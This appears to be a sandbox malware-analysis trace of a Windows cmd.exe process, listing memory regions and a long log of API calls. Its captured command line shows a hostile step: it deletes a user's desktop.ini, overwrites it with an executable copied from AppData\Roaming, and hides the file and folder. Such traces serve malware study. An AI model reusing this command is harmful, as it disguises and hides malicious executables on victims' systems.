start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11149 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 11150 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11199 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11200 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11201 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11202 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 11203 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 11204 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11205 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11206 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11207 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11208 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11209 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11210 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11211 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11212 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11213 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 11214 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11215 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11216 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11217 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 11218 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 11219 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 11220 start_va = 0x580000 end_va = 0x680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11221 start_va = 0x690000 end_va = 0x128ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 11222 start_va = 0x1290000 end_va = 0x13f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 11223 start_va = 0x1400000 end_va = 0x16cefff entry_point = 0x1400000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 151 os_tid = 0x8d0 [0129.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f7c4 | out: lpSystemTimeAsFileTime=0x26f7c4*(dwLowDateTime=0x87236ee0, dwHighDateTime=0x1d440a9)) [0129.526] GetCurrentProcessId () returned 0x8d4 [0129.526] GetCurrentThreadId () returned 0x8d0 [0129.526] GetTickCount () returned 0x296e1 [0129.526] QueryPerformanceCounter (in: lpPerformanceCount=0x26f7bc | out: lpPerformanceCount=0x26f7bc*=18631547790) returned 1 [0129.527] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0129.527] __set_app_type (_Type=0x1) [0129.527] __p__fmode () returned 0x76b331f4 [0129.527] __p__commode () returned 0x76b331fc [0129.527] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0129.527] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0129.527] GetCurrentThreadId () returned 0x8d0 [0129.527] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8d0) returned 0x38 [0129.527] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.527] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0129.527] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.528] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.528] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f754 | out: phkResult=0x26f754*=0x0) returned 0x2 [0129.528] VirtualQuery (in: lpAddress=0x26f78b, lpBuffer=0x26f724, dwLength=0x1c | out: lpBuffer=0x26f724*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.528] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f724, dwLength=0x1c | out: lpBuffer=0x26f724*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0129.528] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f724, dwLength=0x1c | out: lpBuffer=0x26f724*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0129.528] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f724, dwLength=0x1c | out: lpBuffer=0x26f724*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.528] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f724, dwLength=0x1c | out: lpBuffer=0x26f724*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0129.528] GetConsoleOutputCP () returned 0x1b5 [0129.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.528] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0129.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.528] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0129.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.528] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.529] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.529] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.529] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.529] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.529] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0129.529] GetEnvironmentStringsW () returned 0x380418* [0129.529] FreeEnvironmentStringsW (penv=0x380418) returned 1 [0129.529] GetEnvironmentStringsW () returned 0x380418* [0129.529] FreeEnvironmentStringsW (penv=0x380418) returned 1 [0129.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6c4 | out: phkResult=0x26e6c4*=0x40) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0xc8, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x1, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0x1, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x0, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x40, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x40, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0x40, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegCloseKey (hKey=0x40) returned 0x0 [0129.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6c4 | out: phkResult=0x26e6c4*=0x40) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0x40, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x1, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0x1, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x0, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x9, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x9, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0x9, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegCloseKey (hKey=0x40) returned 0x0 [0129.530] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886364 [0129.530] srand (_Seed=0x5b886364) [0129.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"" [0129.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"" [0129.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.531] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x381b78, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0129.531] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.531] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0129.531] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0129.531] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0129.531] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0129.531] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0129.531] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0129.531] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0129.531] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0129.531] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0129.531] GetEnvironmentStringsW () returned 0x382568* [0129.531] FreeEnvironmentStringsW (penv=0x382568) returned 1 [0129.531] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.531] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.531] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0129.532] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0129.532] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0129.532] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0129.532] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0129.532] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0129.532] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0129.532] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0129.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f490 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.532] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f490, lpFilePart=0x26f48c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f48c*="Desktop") returned 0x18 [0129.532] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.532] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f20c | out: lpFindFileData=0x26f20c) returned 0x380bf8 [0129.532] FindClose (in: hFindFile=0x380bf8 | out: hFindFile=0x380bf8) returned 1 [0129.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f20c | out: lpFindFileData=0x26f20c) returned 0x380bf8 [0129.532] FindClose (in: hFindFile=0x380bf8 | out: hFindFile=0x380bf8) returned 1 [0129.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f20c | out: lpFindFileData=0x26f20c) returned 0x380bf8 [0129.532] FindClose (in: hFindFile=0x380bf8 | out: hFindFile=0x380bf8) returned 1 [0129.533] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.533] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0129.533] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0129.533] GetEnvironmentStringsW () returned 0x380418* [0129.533] FreeEnvironmentStringsW (penv=0x380418) returned 1 [0129.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.533] GetConsoleOutputCP () returned 0x1b5 [0129.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.533] GetUserDefaultLCID () returned 0x409 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f5d0, cchData=128 | out: lpLCData="0") returned 2 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f5d0, cchData=128 | out: lpLCData="0") returned 2 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f5d0, cchData=128 | out: lpLCData="1") returned 2 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0129.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0129.536] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0129.536] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0129.537] GetConsoleTitleW (in: lpConsoleTitle=0x370a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.537] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.537] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0129.537] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0129.537] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0129.538] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0129.538] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0129.538] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0129.538] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0129.538] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0129.538] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0129.538] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0129.540] _wcsicmp (_String1="del", _String2=")") returned 59 [0129.540] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0129.540] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0129.540] _wcsicmp (_String1="IF", _String2="del") returned 5 [0129.540] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0129.540] _wcsicmp (_String1="REM", _String2="del") returned 14 [0129.540] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0129.542] _wcsicmp (_String1="type", _String2=")") returned 75 [0129.543] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0129.543] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0129.543] _wcsicmp (_String1="IF", _String2="type") returned -11 [0129.543] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0129.543] _wcsicmp (_String1="REM", _String2="type") returned -2 [0129.543] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0129.546] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0129.546] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0129.546] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0129.546] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0129.546] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0129.546] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0129.570] SetErrorMode (uMode=0x0) returned 0x0 [0129.570] SetErrorMode (uMode=0x1) returned 0x0 [0129.570] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x380420, lpFilePart=0x26ed84 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26ed84*="Desktop") returned 0x18 [0129.570] SetErrorMode (uMode=0x0) returned 0x1 [0129.570] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.570] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0129.575] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.576] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb00) returned 0xffffffff [0129.576] GetLastError () returned 0x2 [0129.576] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb00) returned 0xffffffff [0129.576] GetLastError () returned 0x2 [0129.576] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb00) returned 0x3824e8 [0129.576] FindClose (in: hFindFile=0x3824e8 | out: hFindFile=0x3824e8) returned 1 [0129.576] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb00) returned 0xffffffff [0129.576] GetLastError () returned 0x2 [0129.576] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26eb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb00) returned 0x3824e8 [0129.577] FindClose (in: hFindFile=0x3824e8 | out: hFindFile=0x3824e8) returned 1 [0129.577] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0129.577] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0129.577] GetConsoleTitleW (in: lpConsoleTitle=0x26eff8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.577] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ee80, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ef48 | out: lpAttributeList=0x26ee80, lpSize=0x26ef48) returned 1 [0129.577] UpdateProcThreadAttribute (in: lpAttributeList=0x26ee80, dwFlags=0x0, Attribute=0x60001, lpValue=0x26ef40, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ee80, lpPreviousValue=0x0) returned 1 [0129.577] GetStartupInfoW (in: lpStartupInfo=0x26ee3c | out: lpStartupInfo=0x26ee3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0129.577] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 